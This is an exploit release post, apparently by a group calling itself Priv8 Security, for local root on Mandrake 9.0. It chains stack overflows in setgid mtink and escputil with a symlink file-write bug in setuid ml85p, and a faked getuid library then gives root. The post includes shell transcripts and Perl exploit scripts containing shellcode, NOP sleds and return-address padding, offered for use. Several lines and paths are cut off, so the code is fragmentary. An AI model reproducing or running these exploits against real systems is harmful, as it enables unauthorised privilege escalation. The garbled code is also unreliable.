Mandrake 9.0 local root exploit

 Priv8 Security -
 priv8mdk90.tar.gz - Mandrake 9.0 local root exploit

 Based on Idefense adv.
 Greets to : coideloko, chroot-, xtc , M|ght, exitus,
overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and
all friends of Priv8 security.

OBS. My english sux...

 Ok, our goal is to get root by exploiting ml85p thats
suid root by default on mdk 9.0

[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
-rwsr-x---    1 root     sys         12344 Set 17 16:40

 You can see that we gona need group sys to run it so
first lets get it. 
[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x    1 lp       sys        132600 Set 17 16:40
[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x    1 lp       sys         32088 Set 17 16:40

 We have two here that are vuln, mtink has a stack
overflow on env HOME and escputil
has a stack over too on command line arg, for more
details read idefense adv.

So here we go....
First we get gid sys by exploiting mtink or escputil, u
can choose what one u want to.

[wsxz@localhost priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[wsxz@localhost priv8]$ perl Mandrake 9 mtink local sys exploit!!
 usage: offset
 Using address: 0xbffffa80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)

And now we can exploit ml85p

1 - Writing any file on system!!!

sh-2.05b$ perl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff

Now we check if it worked....

[root@localhost root]# pwd
[root@localhost root]# ls -l hi*
-rw-rw-rw-    1 root     sys             0 Fev 24 03:32

2 - Geting root with it ;)

I will do the same thing on idefense adv, so lets do it..

sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl /etc/
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$ ls -l /etc/
-rw-rw-rw-    1 root     sys             0 Feb 26 00:12
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/ -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/" > /etc/
sh-2.05b$ su -
[root@localhost root]# id
uid=0(root) gid=0(root) grupos=0(root)

It worked, so take care what u ll write ok ;)
that's it.


###################################################### escputil local sys exploit.
#     Tested on Mandrake 9.0 only.
#     Based on

                    $shellcode =
		    "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
		    "\x03".    # x = x03 sys gid
		    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
		    $size = 1050;
                    $retaddr = 0xbffff4e0;
                    $nop = "\x90";
                    $offset = 0;

                    if (@ARGV == 1) {
                    $offset = $ARGV[0];
		    print " Mandrake 9 escputil local
sys exploit!!\n";
		    print " usage: $0 offset\n";
		    for ($i = 0; $i < ($size - length($shellcode) - 4);
$i++) {
                    $buffer .= $nop;

                    $buffer .= $shellcode;

                    print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";

                    $newret = pack('l', ($retaddr +

                    for ($i += length($shellcode); $i <
$size; $i += 4) {
                    $buffer .= $newret;

                    exec("/usr/bin/escputil -c -P


###################################################### ml85p local root exploit.
#      This exploit erase any file on system, u ll need
group sys to do it
#      so run or to get
it ;)
#     Tested on Mandrake 9.0 only.
#     Based on

              if (@ARGV == 1) {
	      $file = $ARGV[0];
	      $b = "/tmp/ml85g";
              $b .= time();
              exec(umask 000);
	      system("ln -s $file '$b'");
              print "Lets write some files ok ;p\n";
	      print "Now just press enter....\n";
                 if  (system("/usr/bin/ml85p -s") == -1){
                      print "You cant run ml85p, check
if u have gid sys...\n";
	     } else {
             print "\n!!! ml85p local
root exploit by wsxz !!!\n";
             print "    Usage: perl $0



###################################################### mtink local sys exploit.
#     Tested on Mandrake 9.0 only.
#     Based on

                    $shellcode2 =
		    "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
		    "\x03".    # x = x03 sys gid
		    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()

		    $size = 1056;
		    $retaddr = 0xbffffa80;
                    $nop = "\x90";
                    $offset = 0;

                    if (@ARGV == 1) {
                    $offset = $ARGV[0];
		    print " Mandrake 9 mtink local sys
		    print " usage: $0 offset\n";

                    for ($i = 0; $i < ($size -
length($shellcode2) - 4); $i++) {
                    $buffer .= $nop;

                    $buffer .= $shellcode2;

                    print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";

                    $newret = pack('l', ($retaddr +

                    for ($i += length($shellcode2); $i
< $size; $i += 4) {
                    $buffer .= $newret;

                    local($ENV{'HOME'}) = $buffer;


